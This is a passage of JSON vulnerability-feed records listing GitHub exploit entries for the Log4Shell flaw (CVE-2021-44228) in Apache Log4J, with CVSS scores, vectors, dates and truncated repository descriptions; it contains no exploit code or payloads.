"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-26T12:00:37", "id": "D536CD4F-33F2-570F-BA34-54E141F1132C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:14", "description": "# Log4J lab\n\n### Description\nThis is a lab ...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T08:13:07", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-28T11:34:04", "id": "2EACBFB9-2956-564B-A859-6C85EF9F785A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:58", "description": "# CVE-2021-44228-Log4Shell-Hashes\nHashes for vulnerable LOG4J ve...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-10T18:06:06", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": fa